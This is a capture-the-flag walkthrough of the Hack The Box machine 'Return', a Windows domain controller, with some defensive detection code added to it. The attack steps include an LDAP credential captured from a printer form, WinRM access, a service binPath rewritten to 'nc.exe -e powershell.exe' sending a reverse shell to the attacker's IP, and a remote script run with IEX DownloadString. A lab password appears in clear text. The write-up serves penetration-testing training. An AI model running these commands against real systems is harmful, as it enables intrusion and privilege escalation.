PRIMARY CATEGORY → EASY

Summary

  • SMB Enumeration (Netexec)
  • DNS Enumeration (Dig)
  • Kerberos User Enumeration (Kerbrute)
  • Trying an AS-REP Roasting Attack (GetNPUsers)
  • Failed RPC Enumeration
  • Fuzzing Web Content using Feroxbuster
  • Fuzzing Virtual Hosts using Gobuster
  • Information Disclosure (Password) via an HTTP Form Request
  • Using Evil-WinRM to establish a connection to the Target via WinRM
  • Local Privesc through the Server Operators Security Group
  • Shell Upgrade to a Fully Interactive TTY (ConPtyShell)


Setup

Directory creation with the Machine’s Name

mkdir Return && cd !$

Creation of a Pentesting Folder Structure to store all the information related to the target

Reference

mkt

Recon

OS Identification

First, identify the target's operating system. A simple ping is enough, taking the TTL value into account

The standard values are →

  • About 64 → Linux
  • About 128 → Windows

ping -c1 10.129.95.241

As mentioned, according to the TTL, it seems to be a Windows target

Port Scanning
General Scan

Let’s run a Nmap Scan to check what TCP Ports are opened in the machine

The Scan result is exported in a grepable format for subsequent Port Parsing

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping -oG allPorts 10.129.95.241

Open Ports

53, 80, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269, 5985, 9389, 47001, 49664, 49665, 49666, 49667, 49671, 49674, 49675, 49676, 49680, 49688 and 49698

Comprehensive Scan

The extractPorts utility is used to get a readable summary of the previous scan and to copy all open ports to the clipboard

extractPorts allPorts
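As an added illustration of what extractPorts does (this is not the write-up's own code nor the extractPorts utility itself), the following Python parses nmap's grepable (-oG) output and produces the comma-separated port list that the targeted scan takes with -p. The sample -oG text is constructed here, with the host and a subset of its ports mirroring the scan above, and is not the author's capture.

```python
import re
from typing import Dict, List

# Constructed sample of `nmap -oG` output (not the write-up's own scan file);
# the host and a subset of its open ports mirror the scan above so the result
# can be compared with the Open Ports list.
SAMPLE_GNMAP = (
    "# Nmap 7.94 scan initiated as: nmap -p- --open -sS -oG allPorts 10.129.95.241\n"
    "Host: 10.129.95.241 ()\tStatus: Up\n"
    "Host: 10.129.95.241 ()\tPorts: 53/open/tcp//domain///, 80/open/tcp//http///, "
    "88/open/tcp//kerberos-sec///, 445/open/tcp//microsoft-ds///, "
    "5985/open/tcp//wsman///, 49664/open/tcp/////\tIgnored State: filtered (65529)\n"
    "# Nmap done -- 1 IP address (1 host up) scanned in 60.00 seconds\n"
)

# One port entry in -oG has seven slash-separated fields:
# port/state/protocol/owner/service/rpc info/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/([^/]*)/([^/]*)/")


def parse_gnmap(text: str) -> Dict[str, List[dict]]:
    """Map each host IP to its port entries (port, state, proto, service)."""
    hosts: Dict[str, List[dict]] = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        # Tab-separated "Key: value" fields; the first one is "Host: <ip> (<name>)"
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        ip = fields["Host"].split()[0]
        hosts.setdefault(ip, [])
        for entry in fields.get("Ports", "").split(", "):
            m = PORT_RE.match(entry.strip())
            if m:
                hosts[ip].append({"port": int(m.group(1)), "state": m.group(2),
                                  "proto": m.group(3), "service": m.group(5)})
    return hosts


def open_ports(text: str, ip: str) -> List[int]:
    """Sorted list of open TCP ports for one host."""
    return sorted(e["port"] for e in parse_gnmap(text).get(ip, [])
                  if e["state"] == "open" and e["proto"] == "tcp")


def ports_argument(text: str, ip: str) -> str:
    """The value handed to `nmap -p<...>` for the comprehensive scan."""
    return ",".join(str(p) for p in open_ports(text, ip))


if __name__ == "__main__":
    print(ports_argument(SAMPLE_GNMAP, "10.129.95.241"))
```

The parser keys on the "Ports:" field only, so the "Status: Up" line and the comment lines are ignored, and an entry with an empty service column (the high ephemeral ports) still yields its port number.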

Then, the Comprehensive Scan is performed to gather the Service and Version running on each open port and launch a set of Nmap Basic Recon Scripts

Note that this scan is also exported to have evidence at hand

nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49674,49675,49676,49680,49688,49698 -sCV -n -Pn --disable-arp-ping -oN targeted 10.129.95.241

We see ports related to services such as LDAP, Kerberos and DNS. Therefore, we can assume that we are dealing with a DC (Domain Controller)

Note that this type of server has many open ports, as an Active Directory deployment runs a large number of services

So, let’s keep calm and go step by step listing all the ports and their related services

139, 445 - SMB

Extraction of General Information

With Domain Controllers and Windows machines, one thing I like to do before anything else is to use netexec to connect to the target via SMB and extract information such as the host name, the domain name (if it is a DC), whether SMB signing is enabled and whether SMBv1 is in use

nxc smb 10.129.95.241

And we got that the machine’s name is Printer and the domain is return.local

Moreover, we now know that the machine's OS is likely to be Windows Server 2019

Since we have a valid domain name and a host name, let’s add them to the /etc/hosts file to refer to the IP Address we have

printf "\n10.129.95.241\tprinter\treturn.local\tprinter.return.local" >> /etc/hosts

List Shared Resources

We can try to list the available SMB shares, if there are any, using netexec again

Since we do not have any valid credentials, let’s try a Null Authentication as follows

nxc smb printer --username '' --password '' --shares

It gives us a STATUS_ACCESS_DENIED, so we know that Null Authentication is not enabled

We could try to authenticate with a random username

nxc smb printer --username 'anyRandomUser' --password '' --shares

The same story here…

Let’s check if the Guest user is enabled in the target

nxc smb printer --username 'guest' --password '' --shares

And It is not!

So, there is no more we can really carry out here until we have some valid credentials

Let’s move on to the next service!

53 - DNS

The Domain Controller is usually the DNS Resolver of the Domain Client Machines

We can start trying to list the version of this DNS Server as follows

dig CHAOS TXT version.bind @10.129.95.241 +noall +answer

But we got a timeout from the DC

We can try to perform a DNS Zone Transfer Attack, so that we can obtain all the DNS Records of the DNS Zone of a specific domain

dig axfr return.local @10.129.95.241 +noall +answer

As we can see, the Zone Transfer failed 😅

But we can use dig with the ANY query type to request every DNS record the same zone holds for the domain

dig ANY return.local @10.129.95.241 +noall +answer

And we have some interesting DNS Records such as printer.return.local and hostmaster.return.local

Let’s add them to the /etc/hosts file

printf "\tprinter.return.local\thostmaster.return.local" >> /etc/hosts

Since port 80, related to a web server, is open, the IIS instance may be using virtual hosts

Therefore, requesting an HTTP resource with the Host header set to return.local may not return the same content as requesting it with hostmaster.return.local

88 - Kerberos

When I see that the Kerberos service is exposed by the Domain Controller, I start to think of attack vectors such as AS-REP Roasting or Kerberoasting

We must know an existing username in the Domain to be able to perform either attack

Right now we do not have any, but we can use tools such as kerbrute to list valid usernames in the target

User Enumeration via Kerbrute

Reference

First of all, git clone the repository and compile the Go source code as follows →

git clone "https://github.com/ropnop/kerbrute" kerbrute
cd !$ && go build -ldflags "-s -w" -o kerbrute .

Once the above is done, we can use kerbrute's userenum module to try to list any valid username according to a given wordlist

./kerbrute userenum --dc printer --domain return.local /usr/share/seclist/Usernames/xato-net-10-million-usernames.txt

If we leave this scan running in the background while we continue with the remaining enumeration, we get the following results

We have two valid usernames. The administrator user always exists, as root does on a Linux machine, but the user printer is an interesting one

AS_Rep Roasting

We can create a file which contains these users and perform an AS-REP Roast attack

printf "%s\n" "printer" > users.txt

Then, just use GetNPUsers.py from Impacket to check if any of the users within the provided file has the UF_DONT_REQUIRE_PREAUTH attribute enabled

The client first sends an AS_REQ without pre-authentication to the AS (Authentication Service) of the KDC (Key Distribution Center)

Then the KDC checks if the requested user has the UF_DONT_REQUIRE_PREAUTH attribute enabled

If not, it replies with the error eRR-PREAUTH-REQUIRED and the client has to send the AS_REQ again, this time with a timestamp encrypted with the user's derived key

But, if the user has the above attribute enabled, then the AS replies with an AS_REP which contains two encrypted sections →

  • Enc Data

Data Chunk (Session Key, Timestamps and User Information) encrypted with the user’s NTLMv1 hash (MD4) using RC4-HMAC or with a PBKDF2-SHA1 derived key from the user’s NTLMv1 hash using AES-{128,256}

  • TGT

The Ticket Granting Ticket of the user which is encrypted, like the Enc Data, using RC4 with the user’s NTLMv1 hash as symmetric key or using AES-256 having previously derived the NTLMv1 hash via PBKDF2-SHA1

In this case, we obtain the following output →

[-] User printer doesn't have UF_DONT_REQUIRE_PREAUTH set

Therefore, we know that the attribute is not enabled for this user and that we have received the eRR-PREAUTH-REQUIRED error. We can confirm it by capturing the Kerberos traffic on the VPN interface with tshark

tshark --interface tun0 -Y "tcp.port == 88" 2> /dev/null

The error code can be extracted as follows →

tshark --interface tun0 -Tfields -e kerberos.error_code -Y "tcp.port == 88" 2> /dev/null

So, we can do nothing more here as we do not know any more existing usernames and we do not have any valid credentials for any user to perform a Kerberoasting Attack
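Seen from the DC side, both the kerbrute sweep and a successful AS-REP roast leave a trace in Security Event ID 4768 (a Kerberos TGT was requested): the sweep as a burst of requests for unknown principals (Result Code 0x6) from one source address, the roast as a TGT issued with Pre-Authentication Type 0. The following Python is an added detection sketch, not part of the write-up; the 4768 records it runs over are constructed with a simplified subset of the event's fields, and the enumeration threshold is an assumption to tune per environment. The last function is the preventive counterpart: the userAccountControl bit that GetNPUsers.py is probing for, read directly from the directory.

```python
from collections import Counter
from typing import Dict, List

# Constructed Security Event ID 4768 records (simplified field subset), not
# telemetry from the write-up's DC. Result codes: 0x0 success,
# 0x6 KDC_ERR_C_PRINCIPAL_UNKNOWN (the requested user does not exist).
SAMPLE_4768: List[dict] = [
    {"TargetUserName": "alice", "IpAddress": "10.0.0.5", "Status": "0x0",
     "PreAuthType": "2", "TicketEncryptionType": "0x12"},
    # a wordlist sweep: many unknown users in a row from one address
    *[{"TargetUserName": f"guess{i}", "IpAddress": "10.10.16.24", "Status": "0x6",
       "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"} for i in range(25)],
    # a TGT issued without pre-authentication and RC4-encrypted: AS-REP roastable
    {"TargetUserName": "svc-legacy", "IpAddress": "10.10.16.24", "Status": "0x0",
     "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    # a single typo from a workstation: below any sensible threshold
    {"TargetUserName": "bob", "IpAddress": "10.0.0.7", "Status": "0x6",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
]

# Assumed threshold: how many unknown-principal failures from one source
# count as enumeration rather than typos
ENUM_THRESHOLD = 10

# userAccountControl bit that disables Kerberos pre-authentication
DONT_REQ_PREAUTH = 0x400000


def detect_user_enumeration(events: List[dict], threshold: int = ENUM_THRESHOLD) -> Dict[str, int]:
    """Source addresses with at least `threshold` TGT requests for unknown users."""
    failures = Counter(e["IpAddress"] for e in events if e["Status"].lower() == "0x6")
    return {ip: n for ip, n in failures.items() if n >= threshold}


def detect_asrep_roast(events: List[dict]) -> List[dict]:
    """TGTs issued with Pre-Authentication Type 0; RC4 (0x17) ones crack fastest offline."""
    return [
        {"user": e["TargetUserName"], "source": e["IpAddress"],
         "rc4": e["TicketEncryptionType"].lower() == "0x17"}
        for e in events
        if e["Status"].lower() == "0x0" and e["PreAuthType"] == "0"
    ]


def preauth_disabled(user_account_control: int) -> bool:
    """Preventive check: is UF_DONT_REQUIRE_PREAUTH set in an account's userAccountControl?"""
    return bool(user_account_control & DONT_REQ_PREAUTH)


if __name__ == "__main__":
    print(detect_user_enumeration(SAMPLE_4768))
    print(detect_asrep_roast(SAMPLE_4768))
    print(preauth_disabled(0x400200), preauth_disabled(0x200))
```

Event 4768 lives in the DC's Security log; a 0x6 burst is the enumeration signature, and a success with Pre-Authentication Type 0 is the roast signature regardless of whether the ticket was ever cracked. Auditing userAccountControl for the 0x400000 bit finds the exposure before anyone requests the ticket.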

135 - RPC

The port 135 related to the RPC Endpoint Mapper is open

As we did in the SMB Section, we can try to authenticate using a Null Session

rpcclient --user '' --no-pass --command 'srvinfo' printer

But we receive again an NT_STATUS_ACCESS_DENIED error as response

The same applies if we try it with a random user

rpcclient --user 'anyRandomUser' --no-pass --command 'srvinfo' printer

This time we get LOGON_FAILURE since the user does not exist in the target

Lastly, we could check if the guest account is enabled, but we already verified it before using SMB

rpcclient --user 'guest%' --command 'srvinfo' printer

80 - HTTP

We check the HTTP Response Headers using curl

curl --silent --request GET --location --head "http://10.129.95.241"

According to the above headers, we know that the web server is Microsoft IIS and the server-side programming language is PHP

Browser-Based Inspection

If we inspect the source code of the index.php resource, there is nothing interesting

  • Index.php

Apart from the index.php resource, there is a settings.php; the remaining menu sections, such as Fax and Troubleshooting, do not work

  • Settings.php

Before inspecting the functionality of the above PHP script, let's apply fuzzing to discover resources such as directories or other PHP files

Fuzzing

To show different tools, we will use feroxbuster for the directory enumeration and gobuster for the PHP files enumeration

  • Only Directories

Reference

feroxbuster --add-slash --threads 200 --output WebScan_directories --wordlist /usr/share/seclist/Discovery/Web-Content/directory-list-2.3-medium.txt --url http://10.129.95.241

Nothing interesting here

  • Directories and PHP Files

Reference

gobuster dir --threads 200 --output fullWebScan --extensions php --wordlist /usr/share/seclist/Discovery/Web-Content/directory-list-2.3-medium.txt --url http://10.129.95.241

Nothing interesting here either

Remember that we discovered some subdomains when we listed the DNS service and mentioned that Virtual Hosting could be implemented by the Web Server

  • printer.return.local

  • hostmaster.return.local

In this case it does not apply; both subdomains serve the same content as the URL http://10.129.95.241

We could perform a Virtual Host enumeration using gobuster

gobuster vhost --append-domain --domain return.local --threads 200 --output vHostScan --wordlist /usr/share/seclist/Discovery/DNS/subdomains-top1million-110000.txt --url http://10.129.95.241

But we got nothing

Therefore, let's inspect the settings.php form further

It seems that the Password field is filled with a string, we could try to inspect the HTML source code and modify the type attribute of the input tag from password to text in order to see the password in plain text

But the value of the type attribute is already text, so we cannot do anything here

Let’s use Burpsuite to intercept the request sent when the Update button is clicked

Only one parameter is sent in the POST HTTP Request → IP

We could try to set the value of this POST parameter to our IP address, having previously set up a listener on port 389

I have said port 389 because it is the default port that appears in the Server Port field in settings.php

nc -nlvp 389

The last string seems to be the value of the Password field, as this field is the last one in the settings.php form

User → svc-printer

Password → 1edFg43012!!
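To make clear why a plain netcat listener on port 389 could read the password: the device attempted an LDAP simple bind, which carries the bind DN and the password as plain BER-encoded octet strings, so anything the form points it at sees them, attacker or, in a monitored network, a sensor. The following Python is an added decoder, not part of the write-up; the bind message it parses is built inline from a constructed DN and a placeholder password, not the credential above. It reports who bound and that a cleartext secret was transmitted, which is the signal a defender needs (with LDAP interface diagnostics enabled, a DC records such unsigned simple binds itself as Directory Service Event 2889).

```python
from typing import Optional, Tuple

# ASN.1/BER tags used by an LDAP BindRequest (RFC 4511)
SEQUENCE, INTEGER, OCTET_STRING = 0x30, 0x02, 0x04
BIND_REQUEST = 0x60          # [APPLICATION 0], constructed
SIMPLE_AUTH = 0x80           # [0] simple, primitive
SASL_AUTH = 0xA3             # [3] sasl, constructed


def _tlv(tag: int, value: bytes) -> bytes:
    """Encode one BER TLV (definite length, short or long form)."""
    if len(value) < 0x80:
        return bytes([tag, len(value)]) + value
    length = len(value).to_bytes((len(value).bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(length)]) + length + value


def _read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Decode one TLV at buf[pos]; return (tag, value, position after it)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long form: next n bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def build_simple_bind(message_id: int, bind_dn: str, password: str) -> bytes:
    """Constructed LDAPv3 simple BindRequest, as a client sends it on the wire
    (message_id kept below 128 so the INTEGER fits one byte)."""
    body = (_tlv(INTEGER, bytes([3])) + _tlv(OCTET_STRING, bind_dn.encode())
            + _tlv(SIMPLE_AUTH, password.encode()))
    return _tlv(SEQUENCE, _tlv(INTEGER, bytes([message_id])) + _tlv(BIND_REQUEST, body))


def inspect_bind(msg: bytes) -> Optional[dict]:
    """Return who bound and whether the secret travelled in cleartext; None if not a bind."""
    tag, body, _ = _read_tlv(msg, 0)
    if tag != SEQUENCE:
        raise ValueError("not an LDAPMessage")
    _, mid, pos = _read_tlv(body, 0)
    tag, op, _ = _read_tlv(body, pos)
    if tag != BIND_REQUEST:
        return None
    _, version, pos = _read_tlv(op, 0)
    _, name, pos = _read_tlv(op, pos)
    auth_tag, auth, _ = _read_tlv(op, pos)
    return {
        "message_id": int.from_bytes(mid, "big"),
        "version": int.from_bytes(version, "big"),
        "bind_dn": name.decode("utf-8", "replace"),
        "method": "simple" if auth_tag == SIMPLE_AUTH else "sasl",
        # a simple bind carries the password as-is; without TLS any listener reads it
        # (an empty simple password is an anonymous bind, so no secret is exposed)
        "cleartext_secret": auth_tag == SIMPLE_AUTH and len(auth) > 0,
        "secret_length": len(auth) if auth_tag == SIMPLE_AUTH else 0,
    }


# Constructed sample: a down-level logon name as bind DN and a placeholder password
SAMPLE_BIND = build_simple_bind(1, "return\\svc-example", "PlaceholderPass1!")

if __name__ == "__main__":
    print(SAMPLE_BIND.hex())
    print(inspect_bind(SAMPLE_BIND))
```

The decoder deliberately does not return the password itself: to know that a credential was exposed, a monitor only needs the bind DN, the method and the fact that the authentication choice was [0] simple over a non-TLS connection. Requiring LDAP signing or LDAPS on the directory side is what removes this exposure regardless of how a device's form is configured.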

We have another valid user, but, before performing an AS-REP Roast attack again for this user, let's see if we can authenticate as it against the DC using the previous password

nxc smb printer --username 'svc-printer' --password '1edFg43012!!'

And we can! So this password is valid for the user svc-printer


Shell as System User via WinRM

Reference

Since port 5985, related to WinRM, is open, let’s check if this user belongs to the Remote Management Users group and then we can connect to the DC using Evil-WinRM

We can also carry out the above validation using netexec and its winrm module

nxc winrm printer --username 'svc-printer' --password '1edFg43012!!'

And we can. So use Evil-WinRM as follows to connect to the target

evil-winrm --ip 10.129.95.241 --user 'svc-printer' --password '1edFg43012!!'

And we’re in! Now, we can go to the Desktop folder of the current user and grab the flag user.txt content

Get-Content C:\Users\svc-printer\Desktop\user.txt

Privesc #1

Initial Non-Privileged User → svc-printer

Server Operators

Once inside, before we proceed to inspect the File System and look for sensitive files or CVEs related to the software installed in the target and located in the Program Files and Program Files (x86) folders, let’s see what privileges the current user has and to which groups the user belongs

whoami /groups
whoami /priv

And the current user is a member of the Server Operators group

Reference

A user which belongs to this AD Security Group (Builtin Group) can perform actions such as →

  • Sign in to the Domain Controller

  • Create and Delete Network Shared Resources

  • Stop and Start Services

  • Backup and Restore Files

Among other actions…

Therefore, since we do not have enough privileges to list the services available on the target, we can leverage Evil-WinRM's built-in commands, such as services, to list all running services and their binary paths

services

As we belong to the Server Operators Security Group, we can modify the binary path of a running service

When we restart that service, It will run its associated binary, in this case, the one that we have specified

Thus, we can upload a netcat binary to the target and refer to it when modifying the path of a particular service

This time, we will use SMBServer.py from Impacket to share the binary and copy it from the DC

Binary Transfer to the Target via SMB

  • From the Attacker ⚔️

smbserver.py -smb2support -user 4l3xbb -password 4l3xbb smbFolder $(pwd)

  • From the Target 🎯

net use Z: \\10.10.16.24\smbFolder /USER:4l3xbb 4l3xbb
Copy-Item -Path 'Z:\nc.exe' -Destination 'C:\ProgramData\nc.exe'

Modification of a Service's Binary Path

Once we have uploaded the nc.exe binary to the target, just proceed as follows to modify the binary path of the services mentioned above, e.g. the VMTools service

sc.exe config VMTools binPath="C:\ProgramData\nc.exe -e powershell.exe 10.10.16.24 443"

If we run again the services command, we see that the binary path related to the above service has been modified correctly

services
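From the defender's side, the binPath change above is a write to the ImagePath value under HKLM\SYSTEM\CurrentControlSet\Services\VMTools, which Sysmon records as Event ID 13 (registry value set). The following Python is an added detection sketch, not part of the write-up; the events it runs over are constructed with a simplified subset of Sysmon's fields, and the trusted-writer and trusted-directory lists are assumptions to tune per environment.

```python
import re
from typing import List, Optional

# Constructed Sysmon Event ID 13 records (simplified field subset), not telemetry
# from the write-up's DC. `sc.exe config <svc> binPath=` lands in the ImagePath value.
SAMPLE_EVENTS: List[dict] = [
    {"EventID": 13, "User": "RETURN\\svc-printer", "Image": "C:\\Windows\\System32\\sc.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\VMTools\\ImagePath",
     "Details": "C:\\ProgramData\\nc.exe -e powershell.exe 10.10.16.24 443"},
    # routine: an installer running as SYSTEM rewrites the same value to its own binary
    {"EventID": 13, "User": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Windows\\System32\\msiexec.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\VMTools\\ImagePath",
     "Details": "\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\""},
    # a different value under a service key: not an ImagePath change
    {"EventID": 13, "User": "RETURN\\svc-printer", "Image": "C:\\Windows\\System32\\sc.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\Spooler\\Start",
     "Details": "DWORD (0x00000002)"},
]

IMAGE_PATH_KEY = re.compile(r"\\Services\\([^\\]+)\\ImagePath$", re.IGNORECASE)

# Assumed allow-lists: service installers run as these accounts and keep binaries
# under these directories; an interactive account pointing elsewhere is the anomaly
TRUSTED_WRITERS = {"NT AUTHORITY\\SYSTEM", "NT AUTHORITY\\LOCAL SERVICE"}
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# IPv4 literal, UNC path, netcat-style "-e", or a shell handed off as the service binary
SUSPICIOUS_ARGS = re.compile(
    r"\b\d{1,3}(?:\.\d{1,3}){3}\b|\\\\[^\\]+\\|\s-e\s|powershell|cmd\.exe", re.IGNORECASE)


def service_name(target_object: str) -> Optional[str]:
    """Service whose ImagePath was written, or None for any other registry value."""
    m = IMAGE_PATH_KEY.search(target_object)
    return m.group(1) if m else None


def flag_service_binary_changes(events: List[dict]) -> List[dict]:
    """Alert on ImagePath writes by untrusted accounts, to untrusted paths, or with odd arguments."""
    alerts = []
    for e in events:
        if e.get("EventID") != 13:
            continue
        svc = service_name(e["TargetObject"])
        if svc is None:
            continue
        new_path = e["Details"].strip()
        binary = new_path.strip('"').lower()
        reasons = []
        if e["User"] not in TRUSTED_WRITERS:
            reasons.append("written by a non-service account")
        if not binary.startswith(TRUSTED_DIRS):
            reasons.append("binary outside standard program directories")
        if SUSPICIOUS_ARGS.search(new_path):
            reasons.append("arguments contain a network address or shell hand-off")
        if reasons:
            alerts.append({"service": svc, "user": e["User"],
                           "new_path": new_path, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in flag_service_binary_changes(SAMPLE_EVENTS):
        print(alert)
```

Each reason is independent, so a legitimate reconfiguration by a human administrator still produces a low-severity alert (one reason), while the pattern above trips all three. The root cause on this host is group membership rather than a bug: removing service accounts from Server Operators, which is what lets them rewrite service configuration on a DC, is the mitigation.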

Set the Listener and Restart the Service to get Remote Access

Note that we have specified that the netcat binary sends a powershell.exe instance to our listening port

Therefore, before proceeding to restart the VMTools service, set the listener on the attacking machine

rlwrap -CaR nc -nlvp 443

Then, from the target, stop and restart the service

sc.exe stop VMTools
sc.exe start VMTools

And now we have access, but there is a problem with this reverse shell: since the service is launched by running the netcat binary we uploaded to the target, it fails after a few seconds and the shell we receive hangs

Getting a Persistent and Fully Interactive Shell

Therefore, I would recommend, before launching the service, preparing the following command to map a drive letter to the SMB server we have, as we did before

net use X: \\10.10.16.24\smbFolder /USER:4l3xbb 4l3xbb

And run the netcat binary directly from the share, specifying another listening port

So, proceed as follows →

  • From the Attacker ⚔️

rlwrap -CaR nc -nlvp 1234

  • From the Target 🎯

Again, stop and start the service

sc.exe stop VMTools
sc.exe start VMTools

Then, we receive the first reverse connection from the launched service

Quickly proceed as follows to associate a shared folder to a local drive and remotely run the netcat binary

net use Y: \\10.10.16.24\smbFolder /USER:4l3xbb 4l3xbb
Y:\nc.exe -e powershell.exe 10.10.16.24 1234

We now have a persistent shell and not a volatile one

But, we need to upgrade it to a Fully Interactive TTY as the shell we have now will die if we press C-c to interrupt a process created from the shell we have

So, we can use ConPtyShell to achieve this task

Basically we need to import a PowerShell module called Invoke-ConPtyShell.ps1, which uses a function called CreatePseudoConsole(), available since Windows 10 and Windows Server 2019 version 1809 (build 10.0.17763)

Therefore, let's check if the target's OS version is at least as recent as the ones listed above

systeminfo | Select-String -Pattern 'OS\s(Name|Version)'

And it is! In fact It is the same as above

Proceed as follows to upgrade it using ConPtyShell

  • From the Attacker ⚔️

Reference

Git clone the repository and set up a simple HTTP server with Python in order to transfer the PowerShell module to the target

git clone https://github.com/antonioCoco/ConPtyShell ConPtyShell
cd !$ && python3 -m http.server 8888

  • From the Target 🎯

Request the shared resource from the target

IEX (New-Object Net.WebClient).downloadString('http://10.10.16.24:8888/Invoke-ConPtyShell.ps1')

  • From the Attacker ⚔️

Get the rows and columns number of the current terminal

stty size

Then, set up a listening port and wait for the connection to be received

nc -nlvp 443

  • From the Target 🎯

Pass the following parameters to the PowerShell function to send the reverse shell to the attacker

Invoke-ConPtyShell -RemoteIp 10.10.16.25 -RemotePort 443 -Rows 61 -Cols 248

Finally, proceed as follows →

  • From the Attacker ⚔️

C-z
stty raw -echo ; fg
Enter

And that’s it! We have a Fully Interactive TTY

It only remains to get the content of the flag root.txt 😊

Get-Content C:\Users\Administrator\Desktop\root.txt